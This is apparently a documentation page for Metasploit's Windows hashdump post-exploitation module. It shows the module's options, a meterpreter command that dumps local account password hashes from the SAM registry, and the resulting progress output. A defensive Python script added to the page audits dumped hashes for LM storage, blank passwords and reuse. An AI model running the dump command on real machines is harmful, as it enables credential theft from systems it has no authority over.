
Description
This module will dump the local user accounts from the SAM database using the registry.
| Platform | Windows |
| Author | Metasploit |
| License | BSD 3-Clause |
| URL | hashdump.rb |
Usage
Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on
Examples
run post/windows/gather/hashdump
Here are the results of running this command from a meterpreter session.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 2609c40b5e36c810763cbc8bf8962276...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
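The module prints each account as a pwdump-style record, `user:rid:lmhash:nthash:::`. The following Python script is an added example, not part of the module or the original page. It audits such output from an authorized assessment for stored LM hashes, blank passwords and shared passwords. The function names, account names and hash values in the sample are constructed; the two empty-password constants are the well-known LM and NT values.

```python
import re
from collections import defaultdict

# Well-known constants: the LM and NT hashes of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump-style record as printed by the module: user:rid:lmhash:nthash:::
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample output (account names and hash values are made up).
SAMPLE = """\
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:22222222222222222222222222222222:33333333333333333333333333333333:::
helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
"""

def parse(text):
    """Return a list of (user, rid, lm, nt); non-record lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            records.append((user, int(rid), lm.lower(), nt.lower()))
    return records

def audit(records):
    """Group accounts by finding so each finding maps to one remediation."""
    by_nt = defaultdict(list)
    findings = {"lm_hash_stored": [], "blank_password": [], "shared_password": []}
    for user, _rid, lm, nt in records:
        if lm != EMPTY_LM:
            # A real LM hash is stored: enforce the NoLMHash policy, then reset.
            findings["lm_hash_stored"].append(user)
        if nt == EMPTY_NT:
            findings["blank_password"].append(user)
        else:
            by_nt[nt].append(user)
    # NT hashes are unsalted, so identical hashes mean identical passwords.
    findings["shared_password"] = sorted(
        sorted(users) for users in by_nt.values() if len(users) > 1)
    return findings

if __name__ == "__main__":
    for name, hits in audit(parse(SAMPLE)).items():
        print(f"{name}: {hits}")
```

Accounts reported under `shared_password` are candidates for unique, managed local passwords, since one recovered credential applies to every account in the group.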
Blog Posts